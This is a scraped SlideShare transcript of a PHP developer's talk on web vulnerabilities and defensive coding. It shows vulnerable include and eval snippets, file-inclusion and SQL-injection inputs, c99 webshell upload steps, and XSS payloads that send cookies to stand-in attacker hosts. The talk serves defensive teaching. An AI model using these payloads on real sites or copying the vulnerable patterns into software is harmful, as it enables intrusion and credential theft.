Download to read offline
![File Inclusion Vulnerability
<?php
if ( isset( $_GET['COLOR'] ) ) {
include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files as anyone can insert
arbitrary values for the COLOR parameter.
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing a malicious code.
/vulnerable.php?COLOR=C:ftpuploadexploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
/vulnerable.php?COLOR=C:notes.txt%00 - example using NULL meta character to remove the .php suffix, allowing access to files other than .php.
(Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator)
/vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.](https://image.slidesharecdn.com/preventhacking-170707055407/75/Prevent-hacking-6-2048.jpg)
![File Inclusion Vulnerability Cont...
For example:
<?php include("inc/" . $_GET['file']); ?>
Valid Inputs:
1. Including files in the same directory: ?file=.htaccess
2. Path Traversal: ?file=../../../../../../../../../var/lib/locate.db (this file is very interesting because it lets you search the
filesystem, other files)
3. Including injected PHP code: ?file=../../../../../../../../../var/log/apache/error.log
Some other examples:
<?php include("inc/" . $_GET['file'] . ".htm"); ?>
<?php include($_GET['file']); ?>
<?php include($_GET['file'] . ".htm"); ?>
<?php include("http://192.168.1.10/config.php"); ?>](https://image.slidesharecdn.com/preventhacking-170707055407/75/Prevent-hacking-7-2048.jpg)
![Dynamic evaluation vulnerabilities
Example code:
$myvar = 'somevalue';
$x = $_GET['arg'];
eval('$myvar = ' . $x . ';');
If "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which
executes a program on the server, in this case "/bin/echo".](https://image.slidesharecdn.com/preventhacking-170707055407/75/Prevent-hacking-12-2048.jpg)
Uploaded byViswanath Polaki
Prevent hacking
This document discusses common web application vulnerabilities and methods for preventing hacking. It covers code injection attacks using C99 shell, file inclusion vulnerabilities through remote and local file access, dictionary attacks, SQL injections, cross-site scripting (XSS), clickjacking, dynamic code evaluation, and countermeasures like input validation, output encoding, prepared statements, and avoiding dangerous functions. The goal is to explain how applications are hacked and defensive coding practices to prevent attacks.
More Related Content
![Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]](https://cdn.slidesharecdn.com/ss_thumbnails/remotefileinclusion-localfileinclusionattackanddefensetechniques-191123200430-thumbnail.jpg?width=640&height=640&fit=bounds)
Prevent hacking
- 1. Prevent Hacking By :Polaki Viswanath
- 2. Welcome About Me 1. Drupaldeveloper. 2. Been coding in php for about 6 years. 3. And been HACKED… a lot. Goal of today’s talk 1. Why PHP is EVIL. Different ways we get hacked. 2. How to avoid being hacked and what is defencive coding style.
- 3. What will wediscuss in today’s talk 1. Cool code injections by c99 shell, File inclusion vulnerability. 2. Dictionary attacks. 3. Sql injections. 4. Script injections like xss (cross site scripting), UI Redress (also Clickjacking) 5. Dynamic evaluation vulnerabilities. 6. How to avoid such attacks.
- 4. C99 Shell Find away to upload c99shell.php then see the magic!!! For example: 1. Find an upload button. 2. Upload a php file having an upload field in a form with .png or .jpg extension. 3. Navigate to the uploaded file and upload the script file. 4. Run the uploaded c99 script file. Source code found on: http://www.c99shellphp.com/
- 5. File Inclusion Vulnerability Thisis categorised in 2 sub categories 1. Remote File Inclusion. 2. Local File Inclusion.
- 6. File Inclusion Vulnerability <?php if( isset( $_GET['COLOR'] ) ) { include( $_GET['COLOR'] . '.php' ); } ?> <form method="get"> <select name="COLOR"> <option value="red">red</option> <option value="blue">blue</option> </select> <input type="submit"> </form> The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files as anyone can insert arbitrary values for the COLOR parameter. /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing a malicious code. /vulnerable.php?COLOR=C:ftpuploadexploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability) /vulnerable.php?COLOR=C:notes.txt%00 - example using NULL meta character to remove the .php suffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator) /vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
- 7. File Inclusion VulnerabilityCont... For example: <?php include("inc/" . $_GET['file']); ?> Valid Inputs: 1. Including files in the same directory: ?file=.htaccess 2. Path Traversal: ?file=../../../../../../../../../var/lib/locate.db (this file is very interesting because it lets you search the filesystem, other files) 3. Including injected PHP code: ?file=../../../../../../../../../var/log/apache/error.log Some other examples: <?php include("inc/" . $_GET['file'] . ".htm"); ?> <?php include($_GET['file']); ?> <?php include($_GET['file'] . ".htm"); ?> <?php include("http://192.168.1.10/config.php"); ?>
- 8. Dictionary Attacks A dictionaryattack is a technique for defeating an authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary.
- 9. Sql injections Normal Query: SELECTUserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' For an input of password' OR '1'='1 in password field Modified Query: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1'
- 10. Cross-Site Scripting orxss attack Valid Input: Very nice site! Modified version: 1. Nice site, I think I'll take it. <script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script> 2. Very nice site! <script>document.write('<iframe src="http://evilattacker.com?cookie=' + document.cookie.escape() + '" height=0 width=0 />');</script>
- 11. Clickjacking or UIRedress A UI Redress attack is any attempt by an attacker to alter the User Interface of a web application. Changing the UI that a user interacts with can allow an attacker to inject new links, new HTML sections, to resize/hide/overlay interface elements, and so on. When such attacks are intended to trick a user into clicking on an injected button or link it is usually referred to as Clickjacking.
- 12. Dynamic evaluation vulnerabilities Examplecode: $myvar = 'somevalue'; $x = $_GET['arg']; eval('$myvar = ' . $x . ';'); If "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo".
- 13. Now what canwe do?
- 14. The answer tobig question 1. Proper monitoring of server, configurations and code review for loopholes. 2. Input validations, Include validations. 3. String escaping and Magic Quotes. 4. Use of prepared Statements. 5. Using exceptions and proper use of “ @ ” symbol, eval, extract, $$ symbol. 6. Avoid use of Backtick, system and eval functions. 7. Type juggling using “==” instead of “===”.
- 15.
- 16.